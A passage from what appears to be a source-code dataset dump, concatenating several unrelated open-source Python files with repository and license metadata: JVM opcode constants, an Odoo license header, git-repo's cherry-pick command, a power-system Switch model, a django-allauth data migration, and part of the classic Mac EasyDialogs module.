# --- Object/array creation and type checks (0xBB-0xC1) ---
NEW = 0xBB
NEWARRAY = 0xBC
ANEWARRAY = 0xBD
ARRAYLENGTH = 0xBE
ATHROW = 0xBF
CHECKCAST = 0xC0
INSTANCEOF = 0xC1

# --- Monitors, wide prefix, multi-dim arrays, null branches (0xC2-0xC9) ---
MONITORENTER = 0xC2
MONITOREXIT = 0xC3
WIDE = 0xC4
MULTIANEWARRAY = 0xC5
IFNULL = 0xC6
IFNONNULL = 0xC7
GOTO_W = 0xC8
JSR_W = 0xC9
| apache-2.0 |
nishad-jobsglobal/odoo-marriot | addons/l10n_it/__init__.py | 447 | 1161 | ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2010
# OpenERP Italian Community (<http://www.openerp-italia.org>)
# Servabit srl
# Agile Business Group sagl
# Domsense srl
# Albatos srl
#
# Copyright (C) 2011
# Associazione OpenERP Italia (<http://www.openerp-italia.org>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
| agpl-3.0 |
fantasyfly/git-repo | subcmds/cherry_pick.py | 48 | 3349 | #
# Copyright (C) 2010 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import sys
from command import Command
from git_command import GitCommand
CHANGE_ID_RE = re.compile(r'^\s*Change-Id: I([0-9a-f]{40})\s*$')
class CherryPick(Command):
  # repo subcommand that cherry-picks a commit and rewrites its commit
  # message, stripping Change-Id trailers and recording provenance.
  common = True
  helpSummary = "Cherry-pick a change."
  helpUsage = """
%prog <sha1>
"""
  helpDescription = """
'%prog' cherry-picks a change from one branch to another.
The change id will be updated, and a reference to the old
change id will be added.
"""

  def _Options(self, p):
    # No subcommand-specific command-line options.
    pass

  def Execute(self, opt, args):
    """Entry point: cherry-pick the single commit named by args[0]."""
    if len(args) != 1:
      self.Usage()

    reference = args[0]

    # Resolve the user-supplied reference to a full SHA-1.
    p = GitCommand(None,
                   ['rev-parse', '--verify', reference],
                   capture_stdout = True,
                   capture_stderr = True)
    if p.Wait() != 0:
      print >>sys.stderr, p.stderr
      sys.exit(1)
    sha1 = p.stdout.strip()

    # Fetch the raw commit object so the original message can be kept.
    p = GitCommand(None, ['cat-file', 'commit', sha1], capture_stdout=True)
    if p.Wait() != 0:
      print >>sys.stderr, "error: Failed to retrieve old commit message"
      sys.exit(1)
    old_msg = self._StripHeader(p.stdout)

    p = GitCommand(None,
                   ['cherry-pick', sha1],
                   capture_stdout = True,
                   capture_stderr = True)
    status = p.Wait()

    print >>sys.stdout, p.stdout
    print >>sys.stderr, p.stderr

    if status == 0:
      # The cherry-pick was applied correctly. We just need to edit the
      # commit message.
      new_msg = self._Reformat(old_msg, sha1)

      p = GitCommand(None, ['commit', '--amend', '-F', '-'],
                     provide_stdin = True,
                     capture_stdout = True,
                     capture_stderr = True)
      p.stdin.write(new_msg)
      if p.Wait() != 0:
        print >>sys.stderr, "error: Failed to update commit message"
        sys.exit(1)
    else:
      # Cherry-pick failed (e.g. conflicts): tell the user how to finish
      # the commit by hand.
      print >>sys.stderr, """\
NOTE: When committing (please see above) and editing the commit message,
please remove the old Change-Id-line and add:
"""
      print >>sys.stderr, self._GetReference(sha1)
      print >>sys.stderr

  def _IsChangeId(self, line):
    # Returns a match object when the line is a Change-Id trailer.
    return CHANGE_ID_RE.match(line)

  def _GetReference(self, sha1):
    # Human-readable provenance line appended to the rewritten message.
    return "(cherry picked from commit %s)" % sha1

  def _StripHeader(self, commit_msg):
    # `git cat-file commit` output has a raw header block; the message
    # body starts after the first blank line.
    lines = commit_msg.splitlines()
    return "\n".join(lines[lines.index("")+1:])

  def _Reformat(self, old_msg, sha1):
    """Return old_msg with Change-Id lines removed and a cherry-pick
    reference appended."""
    new_msg = []

    for line in old_msg.splitlines():
      if not self._IsChangeId(line):
        new_msg.append(line)

    # Add a blank line between the message and the change id/reference
    try:
      if new_msg[-1].strip() != "":
        new_msg.append("")
    except IndexError:
      # Empty message: nothing to separate.
      pass

    new_msg.append(self._GetReference(sha1))
    return "\n".join(new_msg)
| apache-2.0 |
rwl/openpowersystem | cpsm/wires/switch.py | 1 | 1788 | #------------------------------------------------------------------------------
# Copyright (C) 2009 Richard Lincoln
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License as published by the Free
# Software Foundation; version 2 dated June, 1991.
#
# This software is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANDABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#------------------------------------------------------------------------------
""" A generic device designed to close, or open, or both, one or more electric circuits.
"""
# <<< imports
# @generated
from cpsm.core.conducting_equipment import ConductingEquipment
from google.appengine.ext import db
# >>> imports
class Switch(ConductingEquipment):
    """ A generic device designed to close, or open, or both, one or more electric circuits.
    """
    # NOTE: the "# <<< ... / # >>> ..." marker pairs below appear to delimit
    # regions maintained by a code generator ("@generated") -- do not edit
    # inside them by hand without confirming the generator workflow.

    # <<< switch.attributes
    # @generated
    # The attribute is used in cases when no Measurement for the status value is present. If the Switch has a status measurment the Discrete.normalValue is expected to match with the Switch.normalOpen.
    normal_open = db.BooleanProperty()
    # >>> switch.attributes

    # <<< switch.references
    # @generated
    # >>> switch.references

    # <<< switch.operations
    # @generated
    # >>> switch.operations
# EOF -------------------------------------------------------------------------
| agpl-3.0 |
GinnyN/towerofdimensions-django | django-allauth/build/lib/allauth/socialaccount/providers/openid/migrations/0002_tosocialaccount.py | 82 | 7741 | # encoding: utf-8
from south.v2 import DataMigration
class Migration(DataMigration):
    """South data migration: copy legacy OpenIDAccount identities onto the
    generic SocialAccount rows (uid = identity, provider = 'openid')."""

    depends_on = (('socialaccount', '0002_genericmodels'),)

    def forwards(self, orm):
        """For every legacy OpenIDAccount, stamp its parent SocialAccount
        with the OpenID identity URL and the 'openid' provider id."""
        for acc in orm.OpenIDAccount.objects.all():
            sacc = acc.socialaccount_ptr
            sacc.uid = acc.identity
            sacc.provider = 'openid'
            sacc.save()

    def backwards(self, orm):
        "Write your backwards methods here."
        # Intentionally a no-op: the forward copy is not reversed.

    # Frozen ORM model definitions captured by South at migration time.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'openid.openidaccount': {
            'Meta': {'object_name': 'OpenIDAccount', '_ormbases': ['socialaccount.SocialAccount']},
            'identity': ('django.db.models.fields.URLField', [], {'unique': 'True', 'max_length': '255'}),
            'socialaccount_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['socialaccount.SocialAccount']", 'unique': 'True', 'primary_key': 'True'})
        },
        'openid.openidnonce': {
            'Meta': {'object_name': 'OpenIDNonce'},
            'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'salt': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'server_url': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'timestamp': ('django.db.models.fields.IntegerField', [], {})
        },
        'openid.openidstore': {
            'Meta': {'object_name': 'OpenIDStore'},
            'assoc_type': ('django.db.models.fields.TextField', [], {}),
            'handle': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'issued': ('django.db.models.fields.IntegerField', [], {}),
            'lifetime': ('django.db.models.fields.IntegerField', [], {}),
            'secret': ('django.db.models.fields.TextField', [], {}),
            'server_url': ('django.db.models.fields.CharField', [], {'max_length': '255'})
        },
        'sites.site': {
            'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
            'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'socialaccount.socialaccount': {
            'Meta': {'object_name': 'SocialAccount'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'extra_data': ('allauth.socialaccount.fields.JSONField', [], {'default': "'{}'"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'provider': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'uid': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
        },
        'socialaccount.socialapp': {
            'Meta': {'object_name': 'SocialApp'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'key': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
            'provider': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
            'secret': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"})
        },
        'socialaccount.socialtoken': {
            'Meta': {'unique_together': "(('app', 'account'),)", 'object_name': 'SocialToken'},
            'account': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['socialaccount.SocialAccount']"}),
            'app': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['socialaccount.SocialApp']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'token': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'token_secret': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'})
        }
    }

    complete_apps = ['socialaccount', 'openid']
| bsd-3-clause |
pelya/commandergenius | project/jni/python/src/Lib/plat-mac/EasyDialogs.py | 32 | 30567 | """Easy to use dialogs.
Message(msg) -- display a message and an OK button.
AskString(prompt, default) -- ask for a string, display OK and Cancel buttons.
AskPassword(prompt, default) -- like AskString(), but shows text as bullets.
AskYesNoCancel(question, default) -- display a question and Yes, No and Cancel buttons.
GetArgv(optionlist, commandlist) -- fill a sys.argv-like list using a dialog
AskFileForOpen(...) -- Ask the user for an existing file
AskFileForSave(...) -- Ask the user for an output file
AskFolder(...) -- Ask the user to select a folder
bar = Progress(label, maxvalue) -- Display a progress bar
bar.set(value) -- Set value
bar.inc( *amount ) -- increment value by amount (default=1)
bar.label( *newlabel ) -- get or set text label.
More documentation in each function.
This module uses DLOG resources 260 and on.
Based upon STDWIN dialogs with the same names and functions.
"""
from warnings import warnpy3k
warnpy3k("In 3.x, the EasyDialogs module is removed.", stacklevel=2)
from Carbon.Dlg import GetNewDialog, SetDialogItemText, GetDialogItemText, ModalDialog
from Carbon import Qd
from Carbon import QuickDraw
from Carbon import Dialogs
from Carbon import Windows
from Carbon import Dlg,Win,Evt,Events # sdm7g
from Carbon import Ctl
from Carbon import Controls
from Carbon import Menu
from Carbon import AE
import Nav
import MacOS
import string
from Carbon.ControlAccessor import * # Also import Controls constants
import Carbon.File
import macresource
import os
import sys
__all__ = ['Message', 'AskString', 'AskPassword', 'AskYesNoCancel',
'GetArgv', 'AskFileForOpen', 'AskFileForSave', 'AskFolder',
'ProgressBar']
# Guard flag intended to make resource loading a one-time operation.
_initialized = 0

def _initialize():
    """Make the dialog resources (DLOG id 260 and up) available."""
    global _initialized
    if _initialized: return
    # NOTE(review): _initialized is never set to 1 anywhere in this function,
    # so the guard above never trips; macresource.need() is presumably
    # idempotent -- confirm before relying on the flag.
    macresource.need("DLOG", 260, "dialogs.rsrc", __name__)
def _interact():
    """Make sure the application is in the foreground"""
    # 50000000 is the timeout argument to AEInteractWithUser; units per the
    # Apple Event Manager API -- TODO confirm.
    AE.AEInteractWithUser(50000000)
def cr2lf(text):
    """Return *text* with Mac-style '\\r' line endings converted to '\\n'.

    Equivalent to the previous split/join round trip through the
    deprecated ``string`` module, but uses the idiomatic ``str.replace``.
    """
    if '\r' in text:
        text = text.replace('\r', '\n')
    return text
def lf2cr(text):
    """Return *text* with '\\n' converted to Mac-style '\\r', truncated for
    dialog display.

    Dialog item text is limited, so anything longer than 253 characters is
    truncated and suffixed with '\\311' (the MacRoman ellipsis, 0xC9).
    Uses ``str.replace`` instead of the deprecated ``string`` module
    split/join round trip; behavior is unchanged.
    """
    if '\n' in text:
        text = text.replace('\n', '\r')
    if len(text) > 253:
        text = text[:253] + '\311'
    return text
def Message(msg, id=260, ok=None):
    """Display a MESSAGE string.

    Return when the user clicks the OK button or presses Return.

    The MESSAGE string can be at most 255 characters long.
    """
    _initialize()
    _interact()
    d = GetNewDialog(id, -1)
    if not d:
        print "EasyDialogs: Can't get DLOG resource with id =", id, " (missing resource file?)"
        return
    # Item 2 holds the message text.
    h = d.GetDialogItemAsControl(2)
    SetDialogItemText(h, lf2cr(msg))
    if ok is not None:
        # Relabel the default button (dialog item 1).
        h = d.GetDialogItemAsControl(1)
        h.SetControlTitle(ok)
    d.SetDialogDefaultItem(1)
    d.AutoSizeDialog()
    d.GetDialogWindow().ShowWindow()

    while 1:
        n = ModalDialog(None)
        if n == 1:
            # OK dismisses the dialog.
            return
def AskString(prompt, default = "", id=261, ok=None, cancel=None):
    """Display a PROMPT string and a text entry field with a DEFAULT string.

    Return the contents of the text entry field when the user clicks the
    OK button or presses Return.
    Return None when the user clicks the Cancel button.

    If omitted, DEFAULT is empty.

    The PROMPT and DEFAULT strings, as well as the return value,
    can be at most 255 characters long.
    """
    _initialize()
    _interact()
    d = GetNewDialog(id, -1)
    if not d:
        print "EasyDialogs: Can't get DLOG resource with id =", id, " (missing resource file?)"
        return
    # Item 3 = prompt text, item 4 = editable text field.
    h = d.GetDialogItemAsControl(3)
    SetDialogItemText(h, lf2cr(prompt))
    h = d.GetDialogItemAsControl(4)
    SetDialogItemText(h, lf2cr(default))
    # Pre-select the default text so typing replaces it.
    d.SelectDialogItemText(4, 0, 999)
#       d.SetDialogItem(4, 0, 255)
    if ok is not None:
        h = d.GetDialogItemAsControl(1)
        h.SetControlTitle(ok)
    if cancel is not None:
        h = d.GetDialogItemAsControl(2)
        h.SetControlTitle(cancel)
    d.SetDialogDefaultItem(1)
    d.SetDialogCancelItem(2)
    d.AutoSizeDialog()
    d.GetDialogWindow().ShowWindow()

    while 1:
        n = ModalDialog(None)
        if n == 1:
            h = d.GetDialogItemAsControl(4)
            return cr2lf(GetDialogItemText(h))
        if n == 2: return None
def AskPassword(prompt, default='', id=264, ok=None, cancel=None):
    """Display a PROMPT string and a text entry field with a DEFAULT string.
    The string is displayed as bullets only.

    Return the contents of the text entry field when the user clicks the
    OK button or presses Return.
    Return None when the user clicks the Cancel button.

    If omitted, DEFAULT is empty.

    The PROMPT and DEFAULT strings, as well as the return value,
    can be at most 255 characters long.
    """
    _initialize()
    _interact()
    d = GetNewDialog(id, -1)
    if not d:
        print "EasyDialogs: Can't get DLOG resource with id =", id, " (missing resource file?)"
        return
    h = d.GetDialogItemAsControl(3)
    SetDialogItemText(h, lf2cr(prompt))

    pwd = d.GetDialogItemAsControl(4)
    bullets = '\245'*len(default)
    # NOTE(review): 'bullets' is computed but never used; the commented-out
    # call below looks like its intended consumer -- confirm before removing.
##      SetControlData(pwd, kControlEditTextPart, kControlEditTextTextTag, bullets)
    SetControlData(pwd, kControlEditTextPart, kControlEditTextPasswordTag, default)
    d.SelectDialogItemText(4, 0, 999)
    Ctl.SetKeyboardFocus(d.GetDialogWindow(), pwd, kControlEditTextPart)
    if ok is not None:
        h = d.GetDialogItemAsControl(1)
        h.SetControlTitle(ok)
    if cancel is not None:
        h = d.GetDialogItemAsControl(2)
        h.SetControlTitle(cancel)
    d.SetDialogDefaultItem(Dialogs.ok)
    d.SetDialogCancelItem(Dialogs.cancel)
    d.AutoSizeDialog()
    d.GetDialogWindow().ShowWindow()

    while 1:
        n = ModalDialog(None)
        if n == 1:
            h = d.GetDialogItemAsControl(4)
            # Read the real (unbulleted) text back via the password tag.
            return cr2lf(GetControlData(pwd, kControlEditTextPart, kControlEditTextPasswordTag))
        if n == 2: return None
def AskYesNoCancel(question, default = 0, yes=None, no=None, cancel=None, id=262):
    """Display a QUESTION string which can be answered with Yes or No.

    Return 1 when the user clicks the Yes button.
    Return 0 when the user clicks the No button.
    Return -1 when the user clicks the Cancel button.

    When the user presses Return, the DEFAULT value is returned.
    If omitted, this is 0 (No).

    The QUESTION string can be at most 255 characters.
    """
    _initialize()
    _interact()
    d = GetNewDialog(id, -1)
    if not d:
        print "EasyDialogs: Can't get DLOG resource with id =", id, " (missing resource file?)"
        return
    # Button assignments:
    # 1 = default (invisible)
    # 2 = Yes
    # 3 = No
    # 4 = Cancel
    # The question string is item 5
    h = d.GetDialogItemAsControl(5)
    SetDialogItemText(h, lf2cr(question))
    if yes is not None:
        if yes == '':
            # An empty label hides the button entirely.
            d.HideDialogItem(2)
        else:
            h = d.GetDialogItemAsControl(2)
            h.SetControlTitle(yes)
    if no is not None:
        if no == '':
            d.HideDialogItem(3)
        else:
            h = d.GetDialogItemAsControl(3)
            h.SetControlTitle(no)
    if cancel is not None:
        if cancel == '':
            d.HideDialogItem(4)
        else:
            h = d.GetDialogItemAsControl(4)
            h.SetControlTitle(cancel)
    d.SetDialogCancelItem(4)
    # Map the requested DEFAULT onto the matching button item.
    if default == 1:
        d.SetDialogDefaultItem(2)
    elif default == 0:
        d.SetDialogDefaultItem(3)
    elif default == -1:
        d.SetDialogDefaultItem(4)
    d.AutoSizeDialog()
    d.GetDialogWindow().ShowWindow()
    while 1:
        n = ModalDialog(None)
        if n == 1: return default
        if n == 2: return 1
        if n == 3: return 0
        if n == 4: return -1
# Usable screen rectangle, inset by 4 pixels on every side; used to
# constrain window dragging in ProgressBar._update.
screenbounds = Qd.GetQDGlobalsScreenBits().bounds
screenbounds = screenbounds[0]+4, screenbounds[1]+4, \
    screenbounds[2]-4, screenbounds[3]-4

kControlProgressBarIndeterminateTag = 'inde' # from Controls.py
class ProgressBar:
    """Progress dialog (DLOG 263).

    maxval == 0 selects an indeterminate ("barber pole") bar; a positive
    maxval gives a determinate bar.  Clicking the dialog's cancel item
    raises KeyboardInterrupt from set()/inc().
    """
    def __init__(self, title="Working...", maxval=0, label="", id=263):
        self.w = None
        self.d = None
        _initialize()
        self.d = GetNewDialog(id, -1)
        self.w = self.d.GetDialogWindow()
        self.label(label)
        self.title(title)
        self.set(0, maxval)
        self.d.AutoSizeDialog()
        self.w.ShowWindow()
        self.d.DrawDialog()

    def __del__(self):
        # Tear the window down when the bar object goes away.
        if self.w:
            self.w.BringToFront()
            self.w.HideWindow()
        del self.w
        del self.d

    def title(self, newstr=""):
        """title(text) - Set title of progress window"""
        self.w.BringToFront()
        self.w.SetWTitle(newstr)

    def label(self, *newstr):
        """label(text) - Set text in progress box"""
        self.w.BringToFront()
        if newstr:
            self._label = lf2cr(newstr[0])
        text_h = self.d.GetDialogItemAsControl(2)
        SetDialogItemText(text_h, self._label)

    def _update(self, value):
        # Redraw the bar for the new value, then poll for a cancel click.
        maxval = self.maxval
        if maxval == 0:     # an indeterminate bar
            Ctl.IdleControls(self.w)    # spin the barber pole
        else:   # a determinate bar
            if maxval > 32767:
                # Control values are 16-bit; rescale into range.
                value = int(value/(maxval/32767.0))
                maxval = 32767
            maxval = int(maxval)
            value = int(value)
            progbar = self.d.GetDialogItemAsControl(3)
            progbar.SetControlMaximum(maxval)
            progbar.SetControlValue(value)  # set the bar length

        # Test for cancel button
        ready, ev = Evt.WaitNextEvent(Events.mDownMask, 1)
        if ready:
            what,msg,when,where,mod = ev
            part = Win.FindWindow(where)[0]
            if Dlg.IsDialogEvent(ev):
                ds = Dlg.DialogSelect(ev)
                if ds[0] and ds[1] == self.d and ds[-1] == 1:
                    # Cancel was clicked: hide the window and signal the
                    # caller by raising KeyboardInterrupt.
                    self.w.HideWindow()
                    self.w = None
                    self.d = None
                    raise KeyboardInterrupt, ev
            else:
                if part == 4:   # inDrag
                    self.w.DragWindow(where, screenbounds)
                else:
                    MacOS.HandleEvent(ev)

    def set(self, value, max=None):
        """set(value) - Set progress bar position"""
        if max is not None:
            self.maxval = max
            bar = self.d.GetDialogItemAsControl(3)
            if max <= 0:    # indeterminate bar
                bar.SetControlData(0,kControlProgressBarIndeterminateTag,'\x01')
            else:   # determinate bar
                bar.SetControlData(0,kControlProgressBarIndeterminateTag,'\x00')
        # Clamp value into [0, maxval].
        if value < 0:
            value = 0
        elif value > self.maxval:
            value = self.maxval
        self.curval = value
        self._update(value)

    def inc(self, n=1):
        """inc(amt) - Increment progress bar position"""
        self.set(self.curval + n)
# Dialog item numbers for the GetArgv() dialog (DLOG resource 265).
ARGV_ID=265
ARGV_ITEM_OK=1
ARGV_ITEM_CANCEL=2
ARGV_OPTION_GROUP=3
ARGV_OPTION_EXPLAIN=4
ARGV_OPTION_VALUE=5
ARGV_OPTION_ADD=6
ARGV_COMMAND_GROUP=7
ARGV_COMMAND_EXPLAIN=8
ARGV_COMMAND_ADD=9
ARGV_ADD_OLDFILE=10
ARGV_ADD_NEWFILE=11
ARGV_ADD_FOLDER=12
ARGV_CMDLINE_GROUP=13
ARGV_CMDLINE_DATA=14
##def _myModalDialog(d):
## while 1:
## ready, ev = Evt.WaitNextEvent(0xffff, -1)
## print 'DBG: WNE', ready, ev
## if ready :
## what,msg,when,where,mod = ev
## part, window = Win.FindWindow(where)
## if Dlg.IsDialogEvent(ev):
## didit, dlgdone, itemdone = Dlg.DialogSelect(ev)
## print 'DBG: DialogSelect', didit, dlgdone, itemdone, d
## if didit and dlgdone == d:
## return itemdone
## elif window == d.GetDialogWindow():
## d.GetDialogWindow().SelectWindow()
## if part == 4: # inDrag
## d.DragWindow(where, screenbounds)
## else:
## MacOS.HandleEvent(ev)
## else:
## MacOS.HandleEvent(ev)
##
def _setmenu(control, items):
    """Populate a popup-button control's menu from *items*.

    Each item is either a plain label string or a tuple whose first
    element is the label; a trailing '=' or ':' is stripped from the
    displayed label before it is appended to the menu.
    """
    mhandle = control.GetControlData_Handle(Controls.kControlMenuPart,
                    Controls.kControlPopupButtonMenuHandleTag)
    menu = Menu.as_Menu(mhandle)
    for item in items:
        if type(item) == type(()):
            label = item[0]
        else:
            label = item
        if label[-1] == '=' or label[-1] == ':':
            label = label[:-1]
        menu.AppendMenu(label)
##          mhandle, mid = menu.getpopupinfo()
##          control.SetControlData_Handle(Controls.kControlMenuPart,
##                  Controls.kControlPopupButtonMenuHandleTag, mhandle)
    control.SetControlMinimum(1)
    control.SetControlMaximum(len(items)+1)
def _selectoption(d, optionlist, idx):
    """Update dialog *d* for the newly selected option *idx*.

    Shows the option's help text and shows/hides the value entry field
    depending on whether the option label ends in '=' or ':' (i.e. takes
    a value).  Beeps and returns on an out-of-range index.
    """
    if idx < 0 or idx >= len(optionlist):
        MacOS.SysBeep()
        return
    option = optionlist[idx]
    # Tuple options carry help text: (label, ..., help) or 4-tuples with
    # the help string in slot 2.
    if type(option) == type(()):
        if len(option) == 4:
            help = option[2]
        elif len(option) > 1:
            help = option[-1]
        else:
            help = ''
    else:
        help = ''
    h = d.GetDialogItemAsControl(ARGV_OPTION_EXPLAIN)
    if help and len(help) > 250:
        help = help[:250] + '...'
    Dlg.SetDialogItemText(h, help)
    hasvalue = 0
    if type(option) == type(()):
        label = option[0]
    else:
        label = option
    if label[-1] == '=' or label[-1] == ':':
        hasvalue = 1
    h = d.GetDialogItemAsControl(ARGV_OPTION_VALUE)
    Dlg.SetDialogItemText(h, '')
    if hasvalue:
        d.ShowDialogItem(ARGV_OPTION_VALUE)
        d.SelectDialogItemText(ARGV_OPTION_VALUE, 0, 0)
    else:
        d.HideDialogItem(ARGV_OPTION_VALUE)
def GetArgv(optionlist=None, commandlist=None, addoldfile=1, addnewfile=1, addfolder=1, id=ARGV_ID):
    """Put up a dialog that lets the user build an argv-style word list.

    optionlist  -- getopt-style options: each entry is a label string or a
                   tuple whose first element is the label and whose last
                   element is a help string; a trailing '=' or ':' on the
                   label means the option takes a value.
    commandlist -- subcommands, same label / (label, ..., help) convention.
    addoldfile, addnewfile, addfolder -- enable the buttons that append an
                   existing-file, new-file or folder pathname.
    id          -- DLOG resource id for the dialog.

    Returns the resulting list of argument words (quotes around words
    containing spaces are interpreted and removed).  Raises SystemExit
    if the user cancels.
    """
    _initialize()
    _interact()
    d = GetNewDialog(id, -1)
    if not d:
        print "EasyDialogs: Can't get DLOG resource with id =", id, " (missing resource file?)"
        return
#       h = d.GetDialogItemAsControl(3)
#       SetDialogItemText(h, lf2cr(prompt))
#       h = d.GetDialogItemAsControl(4)
#       SetDialogItemText(h, lf2cr(default))
#       d.SelectDialogItemText(4, 0, 999)
#       d.SetDialogItem(4, 0, 255)
    # Fill the option and command popup menus, or grey them out when the
    # caller supplied no entries.
    if optionlist:
        _setmenu(d.GetDialogItemAsControl(ARGV_OPTION_GROUP), optionlist)
        _selectoption(d, optionlist, 0)
    else:
        d.GetDialogItemAsControl(ARGV_OPTION_GROUP).DeactivateControl()
    if commandlist:
        _setmenu(d.GetDialogItemAsControl(ARGV_COMMAND_GROUP), commandlist)
        if type(commandlist[0]) == type(()) and len(commandlist[0]) > 1:
            help = commandlist[0][-1]
            h = d.GetDialogItemAsControl(ARGV_COMMAND_EXPLAIN)
            Dlg.SetDialogItemText(h, help)
    else:
        d.GetDialogItemAsControl(ARGV_COMMAND_GROUP).DeactivateControl()
    # Grey out the pathname buttons the caller disabled.
    if not addoldfile:
        d.GetDialogItemAsControl(ARGV_ADD_OLDFILE).DeactivateControl()
    if not addnewfile:
        d.GetDialogItemAsControl(ARGV_ADD_NEWFILE).DeactivateControl()
    if not addfolder:
        d.GetDialogItemAsControl(ARGV_ADD_FOLDER).DeactivateControl()
    d.SetDialogDefaultItem(ARGV_ITEM_OK)
    d.SetDialogCancelItem(ARGV_ITEM_CANCEL)
    d.GetDialogWindow().ShowWindow()
    d.DrawDialog()
    # Give the dialog full CPU while it is up (classic MacOS scheduling).
    if hasattr(MacOS, 'SchedParams'):
        appsw = MacOS.SchedParams(1, 0)
    try:
        # Modal event loop: each hit on a control appends zero or more
        # words (collected in stringstoadd) to the command-line text item.
        while 1:
            stringstoadd = []
            n = ModalDialog(None)
            if n == ARGV_ITEM_OK:
                break
            elif n == ARGV_ITEM_CANCEL:
                raise SystemExit
            elif n == ARGV_OPTION_GROUP:
                # Popup selection changed: update the help/value display.
